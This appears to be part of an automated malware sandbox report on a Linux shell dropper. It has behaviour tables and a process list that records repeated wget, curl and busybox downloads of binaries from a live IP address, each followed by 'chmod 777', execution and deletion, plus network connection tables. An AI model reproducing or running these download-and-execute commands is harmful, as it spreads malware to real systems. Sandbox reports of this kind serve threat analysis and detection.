| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
Processes
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
